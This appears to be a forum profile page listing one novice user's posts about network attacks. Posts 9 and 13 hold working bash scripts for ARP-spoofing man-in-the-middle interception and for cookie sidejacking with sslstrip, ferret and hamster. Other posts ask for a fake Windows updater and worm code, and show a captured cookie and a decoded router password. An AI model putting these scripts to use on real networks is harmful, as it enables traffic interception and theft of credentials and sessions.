Jump to content

rufus777

Active Members
  • Posts

    32
  • Joined

  • Last visited

Everything posted by rufus777

  1. hmm, if I have a html file with a new windows + I have javascript in the SAME windows? i have done this, but it is not working.. url = "Web_Hysnes.html" webbrowser.open(url) webbrowser.open('javascript:document.forms["HACK"].submit();', new=0)
  2. but in python .... I have created a web browser + Javascript, but it works not ... hehe, I want anything to work with one touch .. import webbrowser import sys url = "Web_Hysnes.html" webbrowser.open(url + 'javascript:document.forms["HACK"].submit();') or import webbrowser import sys url = "Web_Hysnes.html" webbrowser.open(url + '@javascript:document.forms["HACK"].submit();') I am a beginner but I want to learn!
  3. hehe, that was easy! Just HTML! :P
  4. maybe you have javascript code, Sitwon?
  5. JavaScript can't I do, but python that I can do.... ssl server ----> username ---> password ---> accept !!! import httplib conn = httplib.HTTPSConnection("https://10.10.17.10/login.html") conn.request("GET", "/login.html") r1 = conn.getresponse() that is what I have ... GET might be wrong .. Perhaps POST? maybe it's the two of them? httplib is it right? What with urllib? hehe, that can be wrong ,but I will try...
  6. it's screenshot if it is bad english ...
  7. What up? hehe I think of a python script that does everything for me ... I'm at an enterprise that makes a "Web Authentication" ("https://10.10.17.10/login.html") I have "User Name" & "Password", but I have to enter it!!! uff... I think that it is HTML Python, but what is it?? <input type="TEXT" value="" maxlength="80" size="25" name="username"> <input type="Password" value="" maxlength="127" size="25" onkeypress="submitOnEnter(event);" autocomplete="off" emweb_type="PASSWORD" name="password" and <input class="button" type="button" onclick="submitAction()" value="Submit" name="Submit"> I know that the internet has everything, but I go into the forums before I go online ....
  8. pøøøøøøøøøøøø!!!!! hehe, Now I understand!! Sorry!!!
  9. Hay! :) I do not have a code for New Windows Shell? can anyone help me? I've tried gnome-terminal, but it does not work so well ... hehe, I realize that I'm noob but but ..... :P echo "Man in the middel" echo " SNARF " echo " by " echo " Rufus777 " echo -n "Wi-fi: " read -e WIFI echo -n "Gateway IP: " read -e ROUTER echo -n "Target IP: " read -e VICTIM echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i $WIFI -t $VICTIM $ROUTER & arpspoof -i $WIFI -t $ROUTER $VICTIM & gnome-terminal -x urlsniff -i wlan0 & gnome-terminal -x msgsnarf -i wlan0 & gnome-terminal -x dsniff -i wlan0 &
  10. 192.168.0.177 - "rufus777@hotmail.com|b318d8c6dfae674e||" this is the cookies or what?
  11. when I use Metasploit when I use the "mysql", but there are several driver: postgresql, mysql and sqlite3. Why?
  12. yes, i know... when I type in the Shell it works, but sh script that does not work! why? sorry, I'm not English so well...
  13. I have a problem with "sidejacking". I have used the *.sh #!/bin/bash echo "* Firefox_proxy" echo "* 127.0.0.1:1234" echo "" echo -n "Gateway IP: " read -e ROUTER echo -n "Target IP: " read -e VICTIM mkdir sidejacking cd sidejacking echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i wlan0 -t $VICTIM $ROUTER & iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 sslstrip -p -k -f & /pentest/sniffers/hamster/ferret -i wlan0 & /pentest/sniffers/hamster/hamster when I use ferret, simply to get: live (1): LLC: control: unparsed value: 0x0 (0) live (1): LLC: control: unparsed value: 0x0 (0) live (1): LLC: control: unparsed value: 0x0 (0) live (1): LLC: control: unparsed value: 0x0 (0) m.m what's the problem?
  14. I wonder if there is someone who has a fake windows updater ... I wonder what does it take? ports, url? I'm sorry that I write in English, hehe, it's not so good:)
  15. does anyone have a calculator is to measure the GB .... 10 chars is in the "Aa1@"?
  16. rufus777

    Copy ?

    what about linux?
  17. Does anyone have programmed the virus / worm that has been spread around the email and MSN?
  18. rufus777

    Copy ?

    I know that I'm stupid, But "copy /B file1 + file 2 file3" In c + + so I've created a file "system (" echo Mickey was here !!!"); and a file that has "system (" echo ... and here !!!");. ( mikke.exe / mikke2.exe ) Thus, copy /B mikke.exe + mikke2.exe mikke3.exe When I take mikke3.exe to run it, so I get the "Mickey was here!" to nothing more ... hehe, I know it's a bit stupid, but help me? :)
  19. import os #Pidgin-2.7.9 HTTP os.system("wget http://sourceforge.net/projects/pidgin/files/Pidgin/2.7.9/pidgin-2.7.9.exe") #Spotify HTTP os.system("wget http://download.spotify.com/Spotify%20Installer.exe") #Pidgin-2.7.9 Install os.system("pidgin-2.7.9.exe") #Spotify Install os.system("spotify installer.exe") <------------- 'spotify' is not recognized as an internal or external command, operable program or batch file. How should I use "(space)" in os.system???
  20. basic64 password of the netgear was just too easy ... but the DIR-855 uses a different form of the password. ? I have use hnap dlink on DIR-655,( too esay!!! ) but now I have a DIR-855?
  21. hehe, I can not python script! <_< I'm using ("newbie") c + + ,but it will go fast. :D
  22. hey, I have a router "Netgear WGR614" that uses "Basic64" but what about the router "DIR-855"? I try Wireshark, but it is wrong. So Basic64 encryption is wrong ... Do you have a website as "security, basic64 m.m."? What use D-link dir-855?
  23. Decoded Output: admin:r12d at http://www.opinionatedgeek.com/dotnet/tools/base64decode/SafeDecode.aspx
×
×
  • Create New...